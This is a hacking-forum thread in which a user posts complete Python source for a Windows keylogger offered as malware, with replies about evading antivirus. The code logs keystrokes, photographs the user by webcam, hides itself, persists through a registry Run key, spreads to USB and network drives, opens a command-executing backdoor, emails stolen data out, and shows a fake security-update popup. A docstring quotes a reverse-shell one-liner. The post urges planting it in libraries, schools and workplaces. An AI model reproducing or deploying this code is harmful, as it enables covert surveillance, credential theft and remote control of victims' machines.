Author Topic: Python (Windows Keylogger)  (Read 1734 times)

0 Members and 1 Guest are viewing this topic.

Offline $Clone

  • Peasant
  • *
  • Posts: 86
  • Cookies: 5
  • $---Shadowalker---$
    • View Profile
Python (Windows Keylogger)
« on: August 16, 2014, 11:54:56 pm »
Computer Malware (Windows Keylogger )

In reference to the below link:
maybe dead!
https://evilzone.org/scripting-languages/windows-python-keylogger/
I didn't want to cause Kulver too much work so i created a new thread.

I have finally tested it and kinda works fine.....this is a windows keylogger with many features that can be added ...i played around with it in our lab but as it has been pointed out python is not the way to go when creating malware, basically i believe any programming language that relies on its language's virtual machine can't create malware :-X ..... but i could be drank and wrong  :P ......anyway java can prove me otherwise.
This is my second malware however implemented in python with a few functionalities such as:

1.)Gets key presses.
2.)Gets user screenshot image.
3.)Mails the key press and user image
4.)Installs itself in the system
5.)Starts on windows start up
6.)Stealth
7.)Backdoor...i think :-\
8.)Infects network drives and usb drives.

Since its python i didn't really get serious with real application but with py2exe or cx_freeze you could place it in a library,cybercafe,work,school lab etc and just joke around with it.

Its speaks for its self....also note that some of this functions are applicable in  windows c/c++ programming so conversion is easy!

Code: (Python) [Select]

#pywin32 modules
import win32api
import win32con
import win32gui
import win32file

#python modules
import os
import socket
import time
import threading
from smtplib import SMTP
from smtplib import SMTPException
from email.MIMEMultipart import MIMEMultipart
from email.MIMEText import MIMEText
from email.MIMEImage import MIMEImage


#Sample data about the infected computer
'''In order to understand some of the info you will recive from the email,you
will require to go to msdn ref mannuals to identify some function data.C/c++ knowledge
maybe required,but nothing python cannot handle.
e.g:
i.)http://msdn.microsoft.com/en-us/library/windows/desktop/ms724958%28v=vs.85%29.aspx
ii.)http://msdn.microsoft.com/en-us/library/windows/desktop/dd318693%28v=vs.85%29.aspx
iii.)http://msdn.microsoft.com/en-us/library/windows/desktop/ms724958%28v=vs.85%29.aspx
'''

#I know this could be done easily but what tha heck!
CompName="Computer Name:"+str(win32api.GetComputerName())#Computer Name
CommandLine="Commandline:"+str(win32api.GetCommandLine())#Command line used
DomainName="DomainName:"+str(win32api.GetDomainName())#Domain name
FreeSpace="Free space:"+str(win32api.GetDiskFreeSpace())#Hard disk free space
LocalTime="Local time:"+str(win32api.GetLocalTime())#local time
LogicalDrives="Logical Drives:"+win32api.GetLogicalDriveStrings()#list of drivese.g C:\\,E:\\etc
PowerCapabilities="Power Capabilities:"+str(win32api.GetPwrCapabilities())#System power capabilites
language="Language:"+str(win32api.GetSystemDefaultLangID())#System set language
SystemInfo="System Info:"+str(win32api.GetSystemInfo())#system information
SystemInfo_2="System Info 2:"+str(win32api.GetNativeSystemInfo())#like above but for Wow64 process.
TempPath="Temp folder:"+str(win32api.GetTempPath())#path to temp file
TimeZone="Time Zone:"+str(win32api.GetTimeZoneInformation())#Time zone
WindowsVersion="Windows Version:"+str(win32api.GetVersion())#windows version

#Group the infected machine data in a list
listdata=[CompName,CommandLine,DomainName,FreeSpace,LocalTime,LogicalDrives,
          PowerCapabilities,language,SystemInfo,SystemInfo_2,TempPath,TimeZone,
          WindowsVersion]

def Mail_gmail(passwd="",data="Hi Sir this is what i have collected!"):
    """Sends the keypress text file and user snapshot"""
    #email data
    subject="Data from ",CompName
    sender="sendermail2gmail.com"
    receiver="receivermail@gmail.com"
    gmailSMTP="smtp.gmail.com"
    gmailPort=587
    TextSubtype='plain'
   
    #create the email
    msg=MIMEMultipart()
    msg["Subject"]=subject
    msg["From"]=sender
    msg["To"]=receiver
    body=MIMEMultipart('alternative')
    body.attach(MIMEText(data,TextSubtype))
   
    #Attach the message
    msg.attach(body)
    msg.attach(MIMEText(file("Keystroke.txt").read()))
    #attach a pic of the user at start up.
    msg.attach(MIMEImage(file("user.jpg").read()))
    try:
      smtpObj = SMTP(gmailSMTP,gmailPort)
      #Identify yourself to GMAIL ESMTP server.
      smtpObj.ehlo()
      #Put SMTP connection in TLS mode and call ehlo again.
      smtpObj.starttls()
      smtpObj.ehlo()
      #Login to service
      smtpObj.login(user=sender, password=passwd)
      #Send email
      smtpObj.sendmail(sender, receiver, msg.as_string())
      #close connection and session.
      smtpObj.quit()
    except:
        #if error in send mail tell the user to connect to the internet
        #try some social engineering.
        win32api.MessageBox(None,"Please Connect to the internet.Windows requires a urgent security update!","Security update!",win32con.MB_ICONWARNING)
        threading.Timer(300,Mail_gmail)#wait for 5 min assuming the user has connected and send

       
#please note that a yahoo is more simpler to send via than google.
#google has too many restrictions.
        #Yahoo implimentation:
       
def Mail_yahoo(passwd="",data="Hi Sir this is what i have collected!"):
    """Sends the keypress text file"""
    #email data
    subject="Data from ",CompName
    sender=""
    receiver=""
    gmailSMTP="smtp.mail.yahoo.com"
    gmailPort=465
    TextSubtype='plain'

    #create the email
    msg=MIMEMultipart()
    msg["Subject"]="Key"
    msg["From"]=""
    msg["To"]=""
    body=MIMEMultipart('alternative')
    body.attach(MIMEText(data,TextSubtype))

    #Attach the message
    msg.attach(body)
    msg.attach(MIMEText(file("Keystroke.txt").read()))
    #attach a pic of the user at start up.
    #msg.attach(MIMEImage(file("user.jpg").read()))
    try:
        smtpObj = SMTP_SSL(gmailSMTP, gmailPort)
        #Identify yourself to GMAIL ESMTP server.
        #smtpObj.ehlo()
        #Put SMTP connection in TLS mode and call ehlo again.
        #smtpObj.starttls()
        #smtpObj.ehlo()
        #Login to service
        smtpObj.login(user=sender, password=passwd)
        #Send email
        smtpObj.sendmail(sender,receiver, msg.as_string())
        #close connection and session.
        smtpObj.quit()
    except:
        #if error in send mail tell the user to connect to the internet
        #try some social engineering.
        win32api.MessageBox(None,"Please Connect to the internet.Windows requires a urgent security update!","Security update!",win32con.MB_ICONWARNING)
        threading.Timer(300,Mail_yahoo)#wait for 5 min assuming the user has connected and send
       
###############################################################################################

   
def SaveKeys(key_stroke=0,key_file="Keystroke.txt"):
    '''Get Keystrokes and write to file'''
    #Also not this are not the only virutal keys there others you can add them.
   
    if key_stroke==1 or key_stroke==2:
        return 0
    fp=open(os.getcwd()+"\\"+key_file,"a+")
    if key_stroke==8:
        fp.write("[Backspace]")
    elif key_stroke==13:
        fp.write("\n")
    elif key_stroke==32:
        fp.write(" ")
    elif key_stroke==win32con.VK_TAB:
        fp.write("[Tab]")
    elif key_stroke==win32con.VK_SHIFT:
        fp.write("[Shift]")
    elif key_stroke==win32con.VK_CONTROL:
        fp.write("[Control]")
    elif key_stroke==win32con.VK_ESCAPE:
        fp.write("[Escape]")
    elif key_stroke==win32con.VK_END:
        fp.write("[End]")
    elif key_stroke==win32con.VK_HOME:
        fp.write("[Home]")
    elif key_stroke==win32con.VK_LEFT:
         fp.write("[Left]")
    elif key_stroke==win32con.VK_UP:
        fp.write("[UP]")
    elif key_stroke==win32con.VK_RIGHT:
        fp.write("[Right]")
    elif key_stroke==win32con.VK_DOWN:
        fp.write("[Down]")
    elif key_stroke==190 or key_stroke==110:
        fp.write(".")
    else:
        fp.write(chr(key_stroke))#chr(int) ord(string)
    fp.close()

   
def stealth():
    '''hides the window and allows it to run in the background'''
    stealth=win32gui.FindWindow("ConsoleWindowClass",None)
    win32gui.ShowWindow(stealth,0)

   
def UserSnapShot():
    '''take a snapshot of the user'''
    from VideoCapture import Device
    cam=Device()
    cam.saveSnapshot(os.getcwd()+'\\User.jpg')

   
def OnStartup(key_file="Keystroke.txt"):
    '''Opens the log file and creates a start up key'''
    count=1
    #Write infected computer information on to the file.
    fp=open(os.getcwd()+"\\"+key_file,"a+")
    for x in listdata:
        fp.writelines(str(count)+".)"+x+"\n")
        fp.writelines("-----------------------------------------------------------\n")
        count=count+1
    #add keylogger to registery!
    hkey=win32api.RegCreateKey(win32con.HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Run")
    win32api.RegSetValueEx(hkey,'Clone',0,win32con.REG_SZ,(os.getcwd()+"\\keylogger.py"))
    win32api.RegCloseKey(hkey)

#cpu issue but do something about the loop....you can increment the drive so that
#it points to the next drive.   
def UsbNetInfect():
    '''The following function infects usb and network drive'''
    drives=win32api.GetLogicalDriveStrings()
    while drives:
        drives=win32api.GetLogicalDriveStrings()#call it again so that if a usb or network drive is avaliable it copys the keylogger.
        for drive in drives.split("\\"):
            if win32file.GetDriveType(drive)==2 || win32file.GetDriveType(drive)==4:
                win32file.CopyFile("C:\\Keylogger.py",str(drive+"\\"),1)#have the correct int for bFailIfExists
               

#Okay maybe you could do better...i know metasploit does it well...but what tha heck!
def BackConnect():
    '''Executing remote commands via "backdoor"...never mind!
in linux this is easy...windows i don't know...but
{----python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);')
----}
'''
#use this instead to get the results from the command execution.
#proc=subprocess.Popen(command, shell=True, stdout=subprocess.PIPE,\
#                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
#        out,err=proc.communicate()
 #       ip.send(out+err)
#
   
    command=""
    s=socket.socket()
    port=4444
    host=socket.gethostname()
    s.bind((host,port))
    s.listen(10)
    while True:
        ip,addr=s.accept()
        ip.send("Connected to localhost:")
        while command!="quit":
            ip.send("Enter Command:\t 'quit' to stop")
            command=ip.recv(2222)
            res=os.system(command)
            if res==0 and command!="quit":
                ip.send("Command executed successfuly!")
            elif res==1 and command=="quit":
                ip.send("Disconnecting....Goodbye!")
            else:
                ip.send("Command error!")
        s.close() 
 
#Def InfectFiles():
         #fp=open(os.getcwd()+"\\"+key_file,"a+")
        #search files and infect the....overwrite maybe.
        #remember to have a magic sequence an identify so that it does re-infect.
        #blah! blah!
           
   

def main():
    '''start defined functions'''
    stealth()
    OnStartup()
    UserSnapShot()
    UsbNetInfect()
    BackConnect()
   
#key     
i=0

#continously,take key strokes add save in file.
main()
while True:
    for i in range(1,191):
        if win32api.GetAsyncKeyState(i)==-32767:
            SaveKeys(i)
            send=threading.Timer(1200,Mail_gmail)#send email of data(keystroke and snapshot) after 30min
            send.start()

#Notes:
#Yahoo! Mail from any email program are:
#1.)Yahoo! Mail SMTP server address: smtp.mail.yahoo.com
#2.)Yahoo! Mail SMTP user name: Your full Yahoo! Mail email address (including "@yahoo.com")
#3.)Yahoo! Mail SMTP password: Your Yahoo! Mail password
#4.)Yahoo! Mail SMTP port: 465
#5.)Yahoo! Mail SMTP TLS/SSL required: yes
           

Threading..... threading..... threading "you son of a... :o ...."  thats all i can say about multithreading...its not hard implementing it is the problem.

Its got alot of notes and also can be improved to do so much more...but i will implement it in C and post it out.

It consumes CPU due to the looping but if it was C or C++ it would be the same however i will do more research so for now ?? :-\ .PyHook begs to differ and many other programming choices in Ez.

Give heads up on what you think about malwares,viruses and any ideas or codes will be greatly appreciated. ;D             


       
   
       
       
       
   
       
   
       
   
     
   
   
       
   
       
   
   
       
       
   
 
« Last Edit: September 20, 2014, 11:38:48 pm by $Clone »

Offline josazee

  • /dev/null
  • *
  • Posts: 5
  • Cookies: 0
    • View Profile
Re: Python (Windows Keylogger)
« Reply #1 on: September 20, 2014, 11:17:46 pm »
Nice work, really glad to be hear.

Offline khofo

  • EZ's Swashbuckler
  • Knight
  • **
  • Posts: 350
  • Cookies: 25
  • My humor is so black, it could go cotton picking.
    • View Profile
Re: Python (Windows Keylogger)
« Reply #2 on: October 17, 2014, 09:20:32 pm »
AV proof?  And I Think creating a malware with scripting languages can minimize the risk of being detected (I am not sure though).

EDIT: Just realizes I necroed the thread
« Last Edit: October 17, 2014, 09:21:24 pm by Khofo »
Quote from: #Evilzone
<Spacecow18> priests are bad ppl
<Insanity> Holy crap
Of course God isnt dead. He's out there partying with the Easter Bunny, Santa Clause, Tooth Fairy, and the Man on the moon...
Some of my work: Introduction to Physical Security

Offline kenjoe41

  • Symphorophiliac Programmer
  • Administrator
  • Baron
  • *
  • Posts: 990
  • Cookies: 224
    • View Profile
Re: Python (Windows Keylogger)
« Reply #3 on: October 18, 2014, 05:47:56 pm »
But you are right about decreasing the detection with alittle scripting. Even the best flagged shellcode of bind shells can easily be undetectable. It is something you should try out sometime.
If you can't explain it to a 6 year old, you don't understand it yourself.
http://upload.alpha.evilzone.org/index.php?page=img&img=GwkGGneGR7Pl222zVGmNTjerkhkYNGtBuiYXkpyNv4ScOAWQu0-Y8[<NgGw/hsq]>EvbQrOrousk[/img]